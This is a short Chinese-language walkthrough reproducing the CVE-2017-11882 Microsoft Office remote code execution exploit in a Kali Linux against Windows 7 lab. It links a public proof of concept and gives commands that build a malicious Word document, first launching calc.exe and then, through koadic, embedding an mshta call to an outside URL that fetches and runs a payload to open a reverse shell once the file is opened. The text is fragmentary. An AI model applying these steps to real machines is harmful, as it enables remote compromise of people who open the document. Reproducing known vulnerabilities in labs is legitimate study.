攻击机:kali linux
靶机:windows 7 旗舰版
工具及说明
CVE-2017-11882漏洞利用复现
2017年11月14日微软发布了潜伏17年之久的office远程代码执行漏洞(cve-2017-11882)。该漏洞为office内存破坏漏洞,影响目前流行的office版本。
首先到github上下载一个poc
原脚本来自于 1
我们下载这个 ```https://github.com/iBearcat/CVE-2017-11882
利用方法
1 | 第一步::python Command_CVE-2017-11882.py -c “cmd.exe /c calc.exe” -o test.doc |
如果成功的话是这样的
现在我们反弹shell
1 | 下载koadic |
设置LHOST 端口默认9999我们不变
这里可能有utf-8的报错解决方法如下
wq保存
1 | 方法:python Command_CVE-2017-11882.py -c “mshta http://site.com/abc“ -o test.doc |
打开word 拿到权限
结束